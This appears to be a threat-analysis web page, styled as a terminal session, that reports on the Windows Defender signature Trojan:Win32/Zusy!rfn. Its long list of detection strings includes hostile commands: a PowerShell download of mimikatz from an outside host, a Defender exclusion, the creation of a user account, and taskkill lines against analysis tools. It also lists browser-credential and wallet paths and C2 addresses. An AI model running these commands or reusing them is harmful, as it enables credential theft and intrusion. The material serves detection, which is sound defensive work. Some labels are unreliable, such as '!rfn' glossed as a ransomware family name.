user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:Win32/Zusy!rfn
Trojan:Win32/Zusy!rfn - Windows Defender threat signature analysis

Trojan:Win32/Zusy!rfn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Zusy!rfn
Classification:
Type:Trojan
Platform:Win32
Family:Zusy
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Specific ransomware family name
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Zusy

Summary:

Trojan:Win32/Zusy!rfn is a highly evasive trojan that utilizes process hollowing to inject malicious code and evade detection. It establishes command and control (C2) communication with suspicious domains and internal IP addresses, likely for data exfiltration or to receive further instructions. The threat exhibits advanced capabilities for persistence and network interaction.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - ftSK\ (PEHSTR_EXT)
 - Process hollowing complete (PEHSTR_EXT)
 - kqxcstfmcndwzigvhiotcmohs.dll (PEHSTR_EXT)
 - Control_RunDLL (PEHSTR_EXT)
 - Local\RustBacktraceMutex (PEHSTR_EXT)
 - Fsoiasgiosgiosagijsd (PEHSTR_EXT)
 - OIoijsg980segiosghj (PEHSTR_EXT)
 - ENDPOINTDLP.DLL (PEHSTR_EXT)
 - ping 192.168.3.2 -n 7 (PEHSTR_EXT)
 - c.tenor.com (PEHSTR_EXT)
 - troll-trollface.gif -o (PEHSTR_EXT)
 - 10.0.2.15:3000/hook.js (PEHSTR_EXT)
 - DnsHostnameToComputerNameW (PEHSTR_EXT)
 - FGBHNJMK.DLL (PEHSTR_EXT)
 - hiosjh98w4goiw4jserjh (PEHSTR_EXT)
 - fork5.dll (PEHSTR_EXT)
 - shibosjeg984gioserhjser (PEHSTR_EXT)
 - OjsjsofjAsjhgsrijhr (PEHSTR_EXT)
 - ASDFGH.DLL (PEHSTR_EXT)
 - MONIBUYVTY.DLL (PEHSTR_EXT)
 - TRCYTVUBI.DLL (PEHSTR_EXT)
 - DRCTF.DLL (PEHSTR_EXT)
 - fork8.dll (PEHSTR_EXT)
 - http://server.0569.microsoftmiddlename.tk (PEHSTR_EXT)
 - http://imgcache.cloudservicesdevc.tk (PEHSTR_EXT)
 - ProgramData/setting.ini (PEHSTR_EXT)
 - HipsTray.exe (PEHSTR_EXT)
 - vtrbytnuyki.dll (PEHSTR_EXT)
 - poofer_update.pdb (PEHSTR_EXT)
 - fork2.dll (PEHSTR_EXT)
 - Pasdogjseohejh (PEHSTR_EXT)
 - LshdgsikdjgoiQjsfohjf (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - c:\\Destro (PEHSTR_EXT)
 - INJECT_ENJOYERS.pdb (PEHSTR_EXT)
 - shample.ru (PEHSTR_EXT)
 - Shample.pdb (PEHSTR_EXT)
 - C:\TEMP\system.exe (PEHSTR_EXT)
 - C:\TEMP\SHAMple.dat (PEHSTR_EXT)
 - Software\SHAMple (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - avtest\projects\RedTeam\c2implant\implant (PEHSTR_EXT)
 - yarttdn.de (PEHSTR_EXT)
 - C:\ProgramData\tnalpmi.exe (PEHSTR_EXT)
 - Exodus\exodus.wallet (PEHSTR_EXT)
 - Ethereum\keystore (PEHSTR_EXT)
 - Moonchild Productions\Pale Moon (PEHSTR_EXT)
 - Outlook\9375CFF0413111d3B88A00104B2A6676 (PEHSTR_EXT)
 - DLLExportViewer (PEHSTR_EXT)
 - Downloads\uhloader_[unknowncheats.me]_.dll (PEHSTR_EXT)
 - \Xor_Plus\Splash\Xor-hack.bmp (PEHSTR_EXT)
 - Data/Local/z.jpeg (PEHSTR_EXT)
 - /BanHwID/BanHwID.txt (PEHSTR_EXT)
 - GETSERVER2.0 (PEHSTR_EXT)
 - HsrjisrjAjsrihjr (PEHSTR_EXT)
 - OsjigjsrAjiejgiesj (PEHSTR_EXT)
 - BsohjirjAufiseighjseih (PEHSTR_EXT)
 - MshirAijseihjerh (PEHSTR_EXT)
 - OsojgeiherAijseijeh (PEHSTR_EXT)
 - KsoigjsAjshjrijh (PEHSTR_EXT)
 - Aogioswioghswoihjsrjh (PEHSTR_EXT)
 - KoiosdfhgiiIijshgisrjh (PEHSTR_EXT)
 - hjsgisegjoighjseihe (PEHSTR_EXT)
 - BsjiogsjgioAJIjsrgh (PEHSTR_EXT)
 - Kjsjoighsjrhgisrj (PEHSTR_EXT)
 - Jseiopsgopegiosjiohh (PEHSTR_EXT)
 - Bosdgiosigjsewihjseh (PEHSTR_EXT)
 - Vrheroigjw4oiughjser (PEHSTR_EXT)
 - cdn.discordapp.com/attachments/947450701154517052 (PEHSTR_EXT)
 - \yuki-module.dll (PEHSTR_EXT)
 - \dont_load.txt (PEHSTR_EXT)
 - \inject_version.txt (PEHSTR_EXT)
 - \lightcord-temp\extract.exe (PEHSTR_EXT)
 - .ropf (PEHSTR_EXT)
 - Project.Rummage.exe (PEHSTR_EXT)
 - @.ropf (PEHSTR_EXT)
 - \PostInstall\release\PostInstall.pdb (PEHSTR_EXT)
 - MRCorporation.exe (PEHSTR_EXT)
 - MRCorporation.Properties (PEHSTR_EXT)
 - MRCorporation.Properties.Resources.resources (PEHSTR_EXT)
 - MemberDefRidsAllocated.resources (PEHSTR_EXT)
 - tuiyumtynr.dll (PEHSTR_EXT)
 - odkrhnfld.dll (PEHSTR_EXT)
 - rgthryjt.dll (PEHSTR_EXT)
 - .themida (PEHSTR_EXT)
 - SteamService.exe (PEHSTR_EXT)
 - @.i815 (PEHSTR_EXT)
 - dmcommander.exe (PEHSTR_EXT)
 - naqspvwo.dll (PEHSTR_EXT)
 - datuorlp.dll (PEHSTR_EXT)
 - ComputeHash (PEHSTR_EXT)
 - CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (PEHSTR_EXT)
 - \AutoRun.exe (PEHSTR_EXT)
 - E:\Projects\multiloader\bin\Release\inj.pdb (PEHSTR_EXT)
 - Setup=pdf.pdf (PEHSTR_EXT)
 - Setup=pdf.exe (PEHSTR_EXT)
 -          .exe (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 -                                                                    .exe (PEHSTR_EXT)
 - DPApp.com (PEHSTR_EXT)
 - C:\Users\Public\dwwmm.txt (PEHSTR_EXT)
 - /m1.txt (PEHSTR_EXT)
 - lW)/%;. (PEHSTR)
 - kljszdfyrweon34v9345,oireu (PEHSTR_EXT)
 - wsdlq.com/wg/wlbb.txt (PEHSTR_EXT)
 - Software\xcy\ml (PEHSTR_EXT)
 - xieyilei2001.ys168.com (PEHSTR_EXT)
 - 51mole.com (PEHSTR_EXT)
 - mole.61.com (PEHSTR_EXT)
 - wg148.com/newgo.html0 (PEHSTR_EXT)
 - zy.anjian.com/soft/xjl/xjl.php (PEHSTR_EXT)
 - xunxunjp.com/1018jp.txt (PEHSTR_EXT)
 - taskkill /f /t /im iphoneqq.exe (PEHSTR_EXT)
 - iwofeng.com/tc.txt (PEHSTR_EXT)
 - cmd.exe /c net user hello123 hellxxx_Hxxx (PEHSTR_EXT)
 - JS% (SNID)
 - 112.175.69.77 pk555.com 777wt.com www.777wt.com 79.sf923.com sf777.com www.sf99.cc sf99.cc www.meishipai.com jdmzd.com (PEHSTR_EXT)
 - 67.198.179.75 www.22cq.com www.3000okhaosf.com hao119.haole56.com www.sf63.com 456ok.45195.com 79.sf923.com www.53uc.com 53uc.com www.recairen.com (PEHSTR_EXT)
 - Program Files\xcdlq (PEHSTR_EXT)
 - Windows\diskpt.dat (PEHSTR_EXT)
 - Yrnjfb^YZwsokgc_Y[xtplhd`Y\ (PEHSTR_EXT)
 - wallet.tenpay.com/cgi-bin/v1.0/queryqb.cgi (PEHSTR_EXT)
 - http://%s:%d/%s/%s (PEHSTR_EXT)
 - %s%.8x.bat (PEHSTR_EXT)
 - SOFTWARE\GTplus (PEHSTR_EXT)
 - %s M %s -r -o+ -ep1 "%s" "%s\*" (PEHSTR_EXT)
 - ShellExecuteA (PEHSTR_EXT)
 - voipcall.taobao (PEHSTR_EXT)
 - qsyou.com (PEHSTR_EXT)
 - Svdrd.exe (PEHSTR_EXT)
 - Svdrd.Resources.resources (PEHSTR_EXT)
 - 43.136.234.140:7890/Cloud150/SSDTHook_IO_Link.txt (PEHSTR_EXT)
 - AQAQAQ.txt (PEHSTR_EXT)
 - ktkt.txt (PEHSTR_EXT)
 - CMD /C SC DELETE (PEHSTR_EXT)
 - windows\cache\mgr.vbs (PEHSTR_EXT)
 - ftp.forest-fire.net (PEHSTR_EXT)
 - workspace\ (PEHSTR_EXT)
 - 0\bin\Release\ADBlockMasterTray.pdb (PEHSTR_EXT)
 - 12N\{ (SNID)
 - MelonSpoofer_b2.Properties.Resources (PEHSTR_EXT)
 - Mkwimscxva.Properties.Resources (PEHSTR_EXT)
 - WindowsFormsApp47.Properties.Resources.resources (PEHSTR_EXT)
 - Phadgood.MdivideWxflysx (PEHSTR_EXT)
 - togetherfowlappear5yearsthe3saying.o6 (PEHSTR_EXT)
 - heavenmeatbeholdyou.rejseed (PEHSTR_EXT)
 - bcalledthey.retmayflyIY0r (PEHSTR_EXT)
 - Discord DM : _encrypt3d. (PEHSTR_EXT)
 - \StarHighSrcFixV3\Blue loader\Blue loader (PEHSTR_EXT)
 - I Follow You.dll (PEHSTR_EXT)
 - WinExec (PEHSTR_EXT)
 - WinHttpReceiveResponse (PEHSTR_EXT)
 - D:\Desktop\TheDLL\x64\Release\TheDLL.pdb (PEHSTR_EXT)
 - EasyAntiCheat.sys (PEHSTR_EXT)
 - EacExploit.pdb (PEHSTR_EXT)
 - \Device\injdrv (PEHSTR_EXT)
 - \DosDevices\injdrv (PEHSTR_EXT)
 - \Driver\injdrv (PEHSTR_EXT)
 - Failed to open file for writing. (PEHSTR_EXT)
 - stormss.xyz/api (PEHSTR_EXT)
 - Hus Loader.pdb (PEHSTR_EXT)
 - dsc.gg/rive (PEHSTR_EXT)
 - start cmd /C (PEHSTR_EXT)
 - HiveNightmare.pdb (PEHSTR_EXT)
 - //vegax.gg/windows/ui_ver.php (PEHSTR_EXT)
 - VegaX\VegaX\obj\Release\Vega X.pdb (PEHSTR_EXT)
 - HKEY_CURRENT_USER\Software\VegaX (PEHSTR_EXT)
 - /Vega X;component/spawnablewindows/injectcode.xaml (PEHSTR_EXT)
 - autoexec\vegaxfpsunlocker.txt (PEHSTR_EXT)
 - DllCanUnloadNow (PEHSTR_EXT)
 - DllEntry (PEHSTR_EXT)
 - taskkill /f /im ProcessHacker.exe (PEHSTR_EXT)
 - taskkill /f /im FiddlerEverywhere.exe (PEHSTR_EXT)
 - taskkill /f /im OllyDbg.exe (PEHSTR_EXT)
 - taskkill /f /im Ida64.exe (PEHSTR_EXT)
 - \\.\kprocesshacker (PEHSTR_EXT)
 - cdn.discordapp.com/attachments (PEHSTR_EXT)
 - 79.174.92.22 (PEHSTR_EXT)
 - WVY3KZnpiFVzltHbFlr5U2Z30T2llQB1ZKkUGcJVQFxtNW2NL1R3ppZZhpWDSlJhDFF1cFaVxjWVkd3JaWYH7Xw== (PEHSTR_EXT)
 - VWhB9a0JQyMHY1DeWJT6eTR1NcBMueBy0EEFnYwLGD8koFT8ZAMzYTXLmwtkBBZ2EW3M/7JBU/GcjM2rEy4HZLQ== (PEHSTR_EXT)
 - NOSKILL RAFA.pdb (PEHSTR_EXT)
 - powershell.exe-Command (PEHSTR_EXT)
 - Clear-RecycleBin -Force -ErrorAction SilentlyContinueC:\Users\Public (PEHSTR_EXT)
 - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartupUSERPROFILEFailed to get USERPROFILE (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Local State (PEHSTR_EXT)
 - \AppData\Roaming\Microsoft\protects.zip (PEHSTR_EXT)
 - \AutoTorIP\obj\Debug\SecurSocks.pdb (PEHSTR_EXT)
 - powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command (PEHSTR_EXT)
 - -NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command  (PEHSTR_EXT)
 - NeekroAgain\Desktop\esp + aim meu ultimo\esp final testar coisas - Copia - Copia - Copia - Copia\Valorant-External-main\x64\Release (PEHSTR_EXT)
 - rasfdtyasdas.pdb (PEHSTR_EXT)
 - sdfgdfgfd.pdb (PEHSTR_EXT)
 - iasuidosdf.pdb (PEHSTR_EXT)
 - im MESTEResp final testar coisas - Copia - Copia - Copia - CopiaValorant - External - mainValorantOptimusPrinceps.ttf (PEHSTR_EXT)
 - retliften\secivreS\teSlortnoCtnerruC\METSYSs (PEHSTR_EXT)
 - stopify.co/news.php?tid=JBB69H.jpg (PEHSTR_EXT)
 - \AppData\Local\Temp\bin.exe (PEHSTR_EXT)
 - /tsoHbrKdetcirtseR (PEHSTR_EXT)
 - Pillager.dll (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - EncryptedLog.txt (PEHSTR_EXT)
 - KeyAndIV.txt (PEHSTR_EXT)
 - Seven.dll (PEHSTR_EXT)
 - v5.mrmpzjjhn3sgtq5w.pro (PEHSTR_EXT)
 - isapi/isapiv5.dll/v5 (PEHSTR_EXT)
 - pipe\vSDsGRFs62ghf (PEHSTR_EXT)
 - pipe\vsVSDDTGHGSy54 (PEHSTR_EXT)
 - CensoIBGE.RemoveCadastro.resources (PEHSTR_EXT)
 - del /s /f /q C:\Windows\Prefetch (PEHSTR_EXT)
 - deactivation.php?hash= (PEHSTR_EXT)
 - activation.php?code= (PEHSTR_EXT)
 - jmweczbxcvjsi (PEHSTR_EXT)
 - http://103.116.105.90/kyuc1/ (PEHSTR)
 - so2game_lite.exe (PEHSTR)
 - Tyrone.dll (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Koi.Properties (PEHSTR_EXT)
 - settings\shop\type.txt (PEHSTR_EXT)
 - 04 - Downloads.lnk (PEHSTR_EXT)
 - Global\3pc6RWOgectGTFqCowxjeGy3XIGPtLwNrsr2zDctYD4hAU5pj4GW7rm8gHrHyTB6 (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - Execute (PEHSTR_EXT)
 - desktop.ini (PEHSTR_EXT)
 - FinalUncompressedSize (PEHSTR_EXT)
 - RtlGetCompressionWorkSpaceSize (PEHSTR_EXT)
 - System.Net (PEHSTR_EXT)
 - json:"iterator_slice" (PEHSTR_EXT)
 - main.DLLWMain (PEHSTR_EXT)
 - json:"client_id,omitempty (PEHSTR_EXT)
 - `.g.b.g.d.e.`.g.c.;.8. (PEHSTR_EXT)
 - $IM3YYFM.au3 (PEHSTR_EXT)
 - C:\$Recycle. (PEHSTR_EXT)
 - .ps1 (PEHSTR_EXT)
 - ps1 (PEHSTR_EXT)
 - ge.ps1 (PEHSTR_EXT)
 - \'cS@ (SNID)
 - System.Runtime (PEHSTR_EXT)
 - RuntimeCompatibilityAttribute (PEHSTR_EXT)
 - .ctor (PEHSTR_EXT)
 - .Security.Cryptography (PEHSTR_EXT)
 - riotclient://RiotClientServices.exe (PEHSTR_EXT)
 - server1.exe (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - StealerDLL\x64\Release\STEALERDLL.pdb (PEHSTR_EXT)
 - Monero\wallets (PEHSTR_EXT)
 - Thunderbird\Profiles (PEHSTR_EXT)
 - \Users\Public\webdata\info.dat (PEHSTR_EXT)
 - WebSvc ... RegisterMachine w_sUUID (PEHSTR_EXT)
 - /C taskkill /IM %s /F (PEHSTR_EXT)
 - \Google\Chrome\Application\chrome.exe" --restore-last-session (PEHSTR_EXT)
 - dash.zintrack.com (PEHSTR_EXT)
 - You can kill a people, but you can't kill an idea. Resistance will continue until the final liberation of all Palestinian lands, and it is only a matter of time. (PEHSTR_EXT)
 - yahhelper.no-ip.org (PEHSTR_EXT)
 - IP=%s ComputerName=%s UserName=%s Attacked=%d/%d/%d (PEHSTR_EXT)
 - TheComputerOfTheGhost (PEHSTR_EXT)
 - System.Security.Cryptography (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - \Stealler.pdb (PEHSTR_EXT)
 - DllImportAttribute (PEHSTR_EXT)
 - %userappdata%\RestartApp.exe (PEHSTR_EXT)
 - defOff.exe (PEHSTR_EXT)
 - GDI32.dll (PEHSTR_EXT)
 - 32.dll (PEHSTR_EXT)
 - 9.dll (PEHSTR_EXT)
 - System.IO (PEHSTR_EXT)
 - costura.costura.dll.compressed (PEHSTR_EXT)
 - TJprojMain.exe (PEHSTR_EXT)
 - %s:*:enabled:@shell32.dll,-1 (PEHSTR_EXT)
 - BaseOfDll (PEHSTR_EXT)
 - GET /livi.bin (PEHSTR_EXT)
 - \Data\Solutions\ (PEHSTR_EXT)
 - 0.pdb (PEHSTR_EXT)
 - WS2_32.dll (PEHSTR_EXT)
 - /new/net_api (PEHSTR_EXT)
 - powershell -Command  (PEHSTR_EXT)
 - GET / (PEHSTR_EXT)
 - 7N\efkidRdheeMgpx* (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run\W32Time (PEHSTR_EXT)
 - libgcj_s.dll (PEHSTR_EXT)
 - .rsrc (PEHSTR_EXT)
 - Microsoft.VisualBasic.Application (PEHSTR_EXT)
 - System. (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - .rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - D.text (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - .taggant (PEHSTR_EXT)
 - Zn(X\ck+O|jvTG}!mcU@a^ (PEHSTR_EXT)
 - <description>Inno Setup</description> (PEHSTR_EXT)
 - Fsignature.compressed (PEHSTR_EXT)
 - Fakilaharios.Resources (PEHSTR_EXT)
 - ExecutionPolicy Bypass (PEHSTR_EXT)
 - discord.gg (PEHSTR_EXT)
 - ExclusionLoader.pdb (PEHSTR_EXT)
 - pfx.strongname.compressed (PEHSTR_EXT)
 - pfx.stgname.compressed (PEHSTR_EXT)
 - crt.pfx.compressed (PEHSTR_EXT)
 - bbggtth.exe (PEHSTR_EXT)
 - XSPCnxO3J5eKgrbQ3R.7ljbNpdbPT7 (PEHSTR_EXT)
 - my_new_hook_project.dll (PEHSTR_EXT)
 - lognationprimecarraro.com/settings/config2.zip (PEHSTR_EXT)
 - infinitycheats\GameHelpersLoader__NEW\bin\Release\net8.0\win-x64\native\GameHelpersLoader__NEW.pdb (PEHSTR_EXT)
 - cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe (PEHSTR_EXT)
 - cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR (PEHSTR_EXT)
 - lderd\Release\lderd.pdb (PEHSTR_EXT)
 - BobuxManRemastered.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR_EXT)
 - #Add-MpPreference -ExclusionPath C:\ (PEHSTR)
 - &$output = "$env:Temp/RuntimeBroker.exe (PEHSTR)
 - QStart-Process PowerShell -Verb RunAs "-NoProfile -ExecutionPolicy Bypass -Command (PEHSTR)
 - MGetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator (PEHSTR)
 - KTmV3LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtDVTpcUkNXTVxyYyIgLU5hbWUgIiRhcmdzIg (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - URlMON.dLl (PEHSTR_EXT)
 - ,/<-w (PEHSTR_EXT)
 - X.text (PEHSTR_EXT)
 - .gfcd (PEHSTR_EXT)
 - cmd.exe /C timeout /T 1 /NOBREAK >nul (PEHSTR_EXT)
 - TuoniAgent.dll (PEHSTR_EXT)
 - BK: Succesfully deleted registry key: HKEY_LOCAL_MACHINE\%s - "%s (PEHSTR_EXT)
 - taskmgr.exe (PEHSTR_EXT)
 - msconfig.exe (PEHSTR_EXT)
 - shutdown.exe (PEHSTR_EXT)
 - taskkill.exe (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - a-zA-Z0-9+/ (PEHSTR_EXT)
 - AlarmPlus.Properties.Resources.resources (PEHSTR_EXT)
 - +iJuBfovHhKMKXZfVv7Tv8WYJ62/Nvgh3jDNr3UCSUZFE5lLlmSt4pL5+ZbUjcZ6TfUgnUQP92yh9qYAwk/LQQ== (PEHSTR_EXT)
 - Unlocker.exe (PEHSTR_EXT)
 - DownloaderApp.exe (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aa (PEHSTR_EXT)
 - api.telegram.org/bot (PEHSTR_EXT)
 - main.obfuscateCommand (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aaE/SNKAszEoyZwX6Vb7GJggL5/KBLM14rSMqsGxRA+ucLjSsANNLFeQ== (PEHSTR_EXT)
 - E:\VS2010\VC\include\ (PEHSTR_EXT)
 - -> CD/DVD (PEHSTR_EXT)
 - http://195.66.27.77:5554/ (PEHSTR_EXT)
 -  _bound_build.exe (PEHSTR_EXT)
 - http://91.108.241.80:5554/ (PEHSTR_EXT)
 - tjgajdjrg.exe (PEHSTR_EXT)
 - http (PEHSTR_EXT)
 -  .exe (PEHSTR_EXT)
 - 195.66.27.77 (PEHSTR_EXT)
 - 84.21.189.158 (PEHSTR_EXT)
 - nbgtpasrg.exe (PEHSTR_EXT)
 - crypted_build.exe (PEHSTR_EXT)
 - kan\Desktop\den444\den444\obj\Debug\den444.pdb (PEHSTR_EXT)
 - /auto.AutoModeChromeGather (PEHSTR_EXT)
 - %s.tar.gz (PEHSTR_EXT)
 - bits-project/bits/util (PEHSTR_EXT)
 - gather.tH (PEHSTR_EXT)
 - r.tar.gzH (PEHSTR_EXT)
 - Release\sessionuserhost (PEHSTR_EXT)
 - http://176.46.152.62:5858/ (PEHSTR_EXT)
 - *_build.exe (PEHSTR_EXT)
 - http://176.46.152.62:5858/dadaasads_new.ps1 (PEHSTR_EXT)
 - powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File (PEHSTR_EXT)
 - den444.exe (PEHSTR_EXT)
 - .?AV_ (PEHSTR_EXT)
 - Obak.dll ofyh (PEHSTR_EXT)
 - Exercicio05.Properties.Resources (PEHSTR_EXT)
 - wctEE5D.tmp (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: Spoofer.exe
b4b6de07a167b66c62606d30180ebaeef6df3392d2c28c2144dccae20a85915f
24/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected system, perform a comprehensive full system scan with updated security software, and investigate the identified C2 infrastructure (domains and IP) for broader compromise. Block all associated malicious domains/IPs at the network perimeter and reset any potentially compromised user credentials.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 24/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$